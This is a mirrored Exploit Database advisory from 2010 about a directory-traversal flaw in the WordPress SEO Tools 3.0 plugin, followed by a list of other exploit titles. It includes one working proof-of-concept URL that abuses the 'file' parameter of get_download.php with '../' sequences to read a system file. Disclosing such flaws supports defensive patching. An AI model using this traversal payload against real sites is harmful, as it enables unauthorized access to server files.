WordPress Plugin SEO Tools 3.0 – ‘file’ Directory Traversal

Exploit Database
17 阅读

作者： John Leitch

日期： 2010-11-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34975/

source: https://www.securityfocus.com/bid/44710/info

The SEO Tools plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

SEO Tools 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini

last Exploits
WordPress Plugin SEO Tools 3.0 – ‘file’ Directory Traversal的更多信息

Online Store System CMS 1.0 – SQL Injection：
Adobe RoboHelp 9 – DOM Cross-Site Scripting：
Blue River Mura CMS – Directory Traversal：
PHP video script – SQL Injection：
PHP Shopping Cart 4.2 – Multiple-SQLi：
Nuked-klaN Module Boutique – Blind SQL Injection：
BGS CMS 2.2.1 – Multiple Cross-Site Scripting / HTML Injection Vulnerabilities：
netjukebox 4.01B/5.25 – ‘skin’ Cross-Site Scripting：